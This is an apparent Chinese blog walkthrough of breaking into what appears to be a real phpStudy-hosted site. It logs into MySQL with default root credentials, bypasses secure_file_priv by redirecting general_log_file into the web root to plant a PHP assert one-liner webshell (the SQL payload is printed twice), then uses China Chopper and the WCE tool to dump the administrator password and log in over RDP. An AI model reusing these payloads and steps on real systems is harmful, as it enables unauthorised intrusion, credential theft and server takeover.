Mysql root账号general_log_file方法获取webshell

在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell,下面将整个渗透过程和方法跟大家分享。

 
1.信息收集
 
   目标站点访问其子域名,如图1所示,发现该站点是使用phpStudy2014搭建的,通过phpinfo信息泄露,可以获取网站的绝对路径“D:/phpStudy/WWW”,服务器为Windows Server 2003 ,phpstudy探针文件“D:/phpStudy/WWW/l.php”。
 
Mysql root账号general_log_file方法获取webshell
图1获取网站真实路劲等信息
 
2.获取root账号和密码
   phpStudy默认账号为root/root,使用其进行登录,成功登录系统,如果不是这个账号和密码,可以使用phpmyadmin暴力破解工具进行暴力破解,如图2所示,登录后看目前使用的数据应该是www数据库。查看mysql数据库中的user表中的数据,如图3所示,清一色的相同密码。
 
Mysql root账号general_log_file方法获取webshell
图2获取root账号和密码
 
Mysql root账号general_log_file方法获取webshell
图3 mysql数据库user表多个账号使用相同密码
 
3.直接导出webshell失败
   既然知道了网站真实路径“D:/phpStudy/WWW”和root账号,最简单的方法就是直接导出webshell:
所示,在以往是顺利成章的获取webshell,但这次显示错误信息:
 
1
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
意思是Mysql服务器运行“--secure-file-priv”选项,所以不能执行这个语句。
 
Mysql root账号general_log_file方法获取webshell
图4导出webshell失败
 
4. secure_file_priv选项
 
   在mysql中使用secure_file_priv配置项来完成对数据导入导出的限制,前面的webshell导出就是如此,在实际中常常使用语句来导出数据表内容,例如把mydata.user表的数据导出来:
 
 
1
select * from mydata.user into outfile '/home/mysql/user.txt';
在mysql的官方给出了“--secure-file-priv=nameLimit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() to files within specified directory”解释,限制导出导入文件到指定目录,其具体用法:
 
(1)限制mysqld不允许导入和导出
 
1
mysqld --secure_file_prive=null
(2)限制mysqld的导入和导出只能发生在/tmp/目录下
 
 
1
mysqld --secure_file_priv=/tmp/
(3)不对mysqld 的导入和导出做限制,在/etc/my.cnf文件中不指定值。
 
5.通过general_loggeneral_log_file来获取webshell
 
   mysql打开general log之后,所有的查询语句都可以在general log文件中以可读的方式得到,但是这样general log文件会非常大,所以默认都是关闭的。有的时候为了查错等原因,还是需要暂时打开general log的。换句话说general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。在mysql中执行查询:
 
 
 
1
2
3
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
   如图5,图6和图7所示,分别打开general_log开关,设置general_log_file文件,执行查询。
 
Mysql root账号general_log_file方法获取webshell
图5打开general_log开关
Mysql root账号general_log_file方法获取webshell
图6设置general_log_file文件
Mysql root账号general_log_file方法获取webshell
图7执行webshell查询
 
 
6.获取webshell
 
   在浏览器中打开地址http://******.hy******.cn/cmd.php,如图8所示,会显示mysql查询的一些信息,由于一句话后门通过查询写入了日志文件cmd.php,因此通过中国菜刀一句话后门可以成功获取webshell,如图9所示。
 
Mysql root账号general_log_file方法获取webshell
图8查看文件
Mysql root账号general_log_file方法获取webshell
图9获取webshell
 
7.服务器密码获取
 
  (1)查看服务器权限及用户权限
  通过中国菜刀一句话后门管理工具,打开远程终端命令执行,如图10所示,分别执行“whomai”、“net user”、“net localgroup administrator”命令来查看当前用户的权限,当前系统所有用户,管理员用户情况。
Mysql root账号general_log_file方法获取webshell
图10查看当前用户权限
(2)上传wce密码获取工具
    直接执行g86.exe顺利获取管理员密码,如图11所示,开始执行g64.exe没有成功是因为系统是32位操作系统。
Mysql root账号general_log_file方法获取webshell
图11获取管理员密码
 
8.获取远程终端端口
 
  通过命令 tasklist /svc | find "TermService"及netstat -ano | find"1792" 命令来获取当前的3389端口为8369端口,tasklist /svc | find "TermService"获取的是远程终端服务对应的进程号,netstat -ano | find "1792"查看进程号1792所对应的端口,在实际过程中1792值会有变化。
Mysql root账号general_log_file方法获取webshell
图12获取3389端口
 
9.登录3338
 
  打开mstsc,在连接地址中输入202.58.***.***:8369,输入获取的管理员和密码进行登录,如图13所示,成功登录服务器。
 
Mysql root账号general_log_file方法获取webshell
图13登录3389
 
10.总结
 
(1)查看genera文件配置情况
1
show global variables like "%genera%";
(2)关闭general_log
 
 
1
set global general_log=off;
(3)通过general_log选项来获取webshell
 
 
1
2
3
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
上一篇:Ubuntu16.04+CUDA8.0+cuDNN5.1+Python2.7+TensorFlow1.2.0环境搭建


下一篇:iOS相册、相机、通讯录权限获取